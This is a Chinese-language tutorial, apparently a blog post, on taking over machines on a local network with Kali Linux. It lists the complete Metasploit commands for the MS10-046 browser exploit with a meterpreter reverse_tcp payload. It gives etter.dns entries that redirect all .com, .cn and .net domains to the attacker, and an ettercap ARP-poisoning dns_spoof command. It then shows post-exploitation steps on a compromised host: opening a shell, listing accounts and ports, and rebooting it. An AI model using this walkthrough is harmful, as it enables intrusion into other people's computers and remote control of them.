利用kali进行dns劫持入侵局域网

物理主机:kali2.0 192.168.1.50

目标主机:整个局域网

kali 2.0 dns劫持入侵局域网

运行msfconsole

依次输入:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块

setg SRVHOST 192.168.1.50 //设置全局服务主机IP

set PAYLOAD windows/meterpreter/reverse_tcp //加载PAYLOAD攻击模块

setg LHOST 192.168.1.50 //设置攻击模块全局主机IP

exploit //攻击

这么配置只要局域网内有哪一台主机访问到http://192.168.1.50:80/这个链接就会中马。

然后修改ettercap DNS文件。

文件目录:/etc/ettercap/etter.dns

用记事本打开它。

ctrl+f 搜索

关键字:# redirect it to http://www.linux.org

这样修改一下,如图。

kali 2.0 dns劫持入侵局域网

# redirect it to http://www.linux.org

在下方依次添加

* A 192.168.1.50

* PTR 192.168.1.50

* .net 192.168.1.50

* .cn 192.168.1.50

* .com 192.168.1.50

然后保存即可。

kali 2.0 dns劫持入侵局域网

打开终端,运行ettercap输入如下命令:

ettercap -T -q -i eth0 -P dns_spoof -M arp

-M MAC监听

-T 脱机监听

-P 过滤筛选器

-i 使用此网络接口

eth0 本机网卡

ARP拦截局域网所有的DNS映射到本机的etter.dns中

kali 2.0 dns劫持入侵局域网

列表滚动,局域网内已经有机器在打开网页。

kali 2.0 dns劫持入侵局域网

局域网主机只要一打开网页,DNS都会映射到本机的IP上,淫荡的中马。

kali 2.0 dns劫持入侵局域网

sessions 查看,得到一台主机 192.168.1.12

kali 2.0 dns劫持入侵局域网

sessions -i 1 进入劫持会话

kali 2.0 dns劫持入侵局域网

kali 2.0 dns劫持入侵局域网

shell -在受害者计算机上打开一个shell

net user // 查看计算机账户

netstat -ano //查看连接与开放的端口

这里可以看到192.168.1.12:1074与192.168.1.50:4444端口正在连接。

kali 2.0 dns劫持入侵局域网

ps -列出正在运行的进程

getpid -获取当前进程 ID (PID)

3068

kali 2.0 dns劫持入侵局域网

reboot重启对方计算机,输入后已经与192.168.1.12断开连接。